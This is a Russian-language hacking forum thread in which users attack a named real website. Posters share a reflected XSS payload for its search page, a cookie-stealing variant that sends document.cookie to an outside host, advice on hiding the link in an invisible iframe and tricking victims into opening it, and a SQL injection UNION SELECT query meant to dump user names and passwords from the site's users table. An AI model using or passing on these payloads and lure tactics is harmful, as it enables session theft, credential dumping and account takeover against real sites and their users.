Привет всем, я нашел дыру вот тут -

1. http://wow.crpg.ru/search.php
если сделать так:
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script

то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...

2. а еще там же дыра -
http://wow.crpg.ru/printfeature.php?artid=
если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк? :rolleyes:

1 Можно украсть куки.

2 Это по ходу не дыра.. А ошибка в скрипте.

Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.

А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).

1 Можно украсть куки.


Тык как цивилизованно украсть то? не пошлешь же ссылку вида
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>

Как-бы ее запрятать так, чтоб явно не торчала...

А ошибка в скрипте - не дыра? ))

нет...

КЕЗ не всегда.
"))))"

нет, конечно если там написано
fopem вместо fopen то да, это вообще ничего работать небудет,
но в данном случае это и ест дыра

Ближе к теме, мальчики и девочки :)
с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере...

Тык как цивилизованно украсть то?
Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).

p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить

а во второй ссылке разве нету Скуль Инж-а?

есть там инъекция

я и про это =)) а то сказали что нету во второй ничего это просто ошибка...там же написано что ошибка в мускуле...значит есть вероятность инжекшена

Тык примерчик напишите, хуч... ато уже от видеохаков глаза болят :)

Я понимаю что нужно выполнить запрос, но не могу воткнуть как

я не силен в мускл но обычный запроса типа 999'СЕЛЕКТ админ ФРОМ юзерз не сработал )))

Осталось только подставить where с именем пользователя:
http://wow.crpg.ru/printfeature.php?artid=-1+UNION+SELECT+null,null,name,pass,null,null,null, null+from+users/*
Спать хочу, не могу =)

ыы... а дальше что? Чувствую себя тупым как буратино : (

Странно, что не работает. Ошибки нет, имена столбцов тоже правильно угаданы. =) Может кто знает почему?
http://wow.crpg.ru/printfeature.php?artid=-1+UNION+SELECT+null,null,name,pass,null,null,null, null+from+users+where+uid=1/*

странно...)

Да, очень странно :)

ну, не выводит, надо менять местами ник, чтобы найти где выводит его

Ты бы попробовал вначале. Выводятся 3,4,7 столбцы